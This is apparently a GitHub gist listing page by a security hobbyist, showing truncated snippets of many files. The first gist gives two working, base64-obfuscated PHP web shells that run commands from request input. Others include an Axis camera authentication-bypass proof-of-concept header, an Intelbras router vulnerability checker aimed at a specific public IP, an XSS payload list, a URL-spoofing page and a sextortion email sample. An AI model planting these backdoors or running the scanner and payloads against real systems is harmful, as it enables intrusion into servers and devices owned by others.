Skip to content

Instantly share code, notes, and snippets.

View MrCl0wnLab's full-sized avatar
🏠
Working from home

Mr. Cl0wn - H4ck1ng C0d3r MrCl0wnLab

🏠
Working from home
View GitHub Profile
@MrCl0wnLab
MrCl0wnLab / BACKDOORS PHP
Last active August 29, 2019 13:45
backdoors-PHP.txt
# MODEL-01 CODE BASE64 + FUNCTION DEFINE >>
<?php (error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ=")).define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);?>
# MODEL-02 CODE BASE64 + VALIDATION REQUEST>>
<?php (($__=@base64_decode("c3lzdGVt")).print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);?>
@MrCl0wnLab
MrCl0wnLab / requestCamAxisPOC.lua
Last active August 31, 2019 05:37
POC Request Axis Cam ( CVE: CVE-2003-0240 )
--[[
-- BY MrCl0wnLab & r00t-3xp10it
-- https://gist.github.com/MrCl0wnLab
axis-network-camera-http-authentication-bypass
https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass
CVE: CVE-2003-0240
Vulnerability Description:
@MrCl0wnLab
MrCl0wnLab / checkVulns-rounterIntelbras.lua
Created September 6, 2019 06:25
Checke vulns Roteadores IntelBras
-- DEPENDENCIES (lua libraries) --
local http = require("socket.http")
local string = require("string")
local os = require("os")
target = "http://191.17.73.234"
port = 8081;
uri_request_list = {
-- URI INTELBRAS
@MrCl0wnLab
MrCl0wnLab / PHPProxyRequest.php
Created September 10, 2019 23:44
Uso de proxy random em request
<?php
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '1024M');
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
(!isset($_SESSION) ? session_start() : NULL);
@MrCl0wnLab
MrCl0wnLab / Movimentacao.cs
Created January 9, 2020 17:04
Script movimentação de personagem Unity3D
using System.Collections;
using System.Collections.Generic;
using UnityEngine;
public class Movimentacao : MonoBehaviour
{
public Rigidbody rb;
public Animator anim;
public float moveSpeed = 20.0f;
@MrCl0wnLab
MrCl0wnLab / file.txt
Last active March 1, 2020 01:38
Arquivo para estudo de Scan XSS
<script>alert(0)</script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
@MrCl0wnLab
MrCl0wnLab / blackmail.txt
Created April 14, 2020 16:11
Body Web Sextortion (webcam blackmail) / Anti-Grep
---------- Forwarded message ---------
De: Jeanlou Zanella <huocleavlanddk@outlook.com>
Date: seg., 13 de abr. de 2020 às 16:35
Subject: jessiXXXXXXXXX : 44244JE
To: jessiXXXXXXXXX@gmail.com <jessiXXXXXXXXX@gmail.com>
Pa𝗒 $10𝟢𝟢 𝗂𝗇 𝖻tc 𝗍𝗈 𝗍𝗁𝖾 𝖽own 𝖻𝖾𝗅𝗈w 𝖺dd𝗋es𝗌:
bc1***qjma8cz8ry8lr5x3zc8w44cwthstxknr4lpzsdk
@MrCl0wnLab
MrCl0wnLab / Sender-mailgun.php
Created April 16, 2020 01:23
Exemplo de uso Class PHP criada para envio simples de email via API Mailgun
<?php
require_once('SenderMailgun.php');
# Open file key
$key = file_get_contents('key');
# Instantiate the client.
SenderMailgun::$api_key = $key;
# Data params email.
@MrCl0wnLab
MrCl0wnLab / Get_thumbnail_src_from_Instagram.html
Last active June 26, 2020 23:21
Get thumbnail_src from Instagram
<!DOCTYPE html>
<html>
<head>
<script data-require="jquery@3.0.0" data-semver="3.0.0" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.0.0/jquery.js"></script>
<script src="script.js"></script>
<link href="style.css" rel="stylesheet">
</head>
<body>
<!DOCTYPE HTML>
<html lang="en-US">
<head>
<meta charset="UTF-8">
<title>URL Spoofing</title>
<style>
*{font-family:Mukta,sans-serif;color:#3b3b3b}small{color:gray;font-weight:400;font-style:italic;font-size:16px;margin-top:-20px;display:block;margin-bottom:30px}small strong{font-weight:600;font-size:18px;color:inherit}h2{margin-top:40px;color:#424242}
</style>
<script>
onload = function() {